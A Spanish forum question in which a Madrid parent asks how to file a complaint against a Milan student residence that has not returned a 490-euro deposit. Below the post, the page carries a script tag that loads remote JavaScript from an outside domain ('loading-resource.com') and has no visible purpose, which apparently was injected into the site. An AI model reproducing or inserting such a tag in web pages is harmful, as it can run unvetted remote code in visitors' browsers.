Pasos a seguir para denunciar una residencia de estudiantes en Milan.

Mi hijo durante el curso pasado estuvo con una beca Erasmus en Milán, se hospedó toda su estancia en una residencia llamada Expo college. Se realizó el pago de una fianza de 450 euros a devolver a las tres semanas de dejar la residencia. El pasado día 20 de Julio volvió definitivamente a España y a día de hoy todavía no le han devuelto el importe de la fianza ni la parte proporcional de los días del mes que no estuvo,, en total 490 euros, que ellos mismos me dijeron que procederían a ingresarme en cuenta a las tres semanas aproximadamente. Después de ponerme en contacto varias veces en este tiempo,, me dicen que tienen un problema en el departamento de contabilidad por el cual hasta la segunda semana de octubre no pueden devolvérmelo. Me temo que pueden estar dándome largas y quiero saber cómo se tiene que proceder para denunciar este hecho. Dónde se interpone la denuncia, y saber cual es un poco el procedimiento. Nosotros vivimos en Madrid.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

Añade tu respuesta

Haz clic para o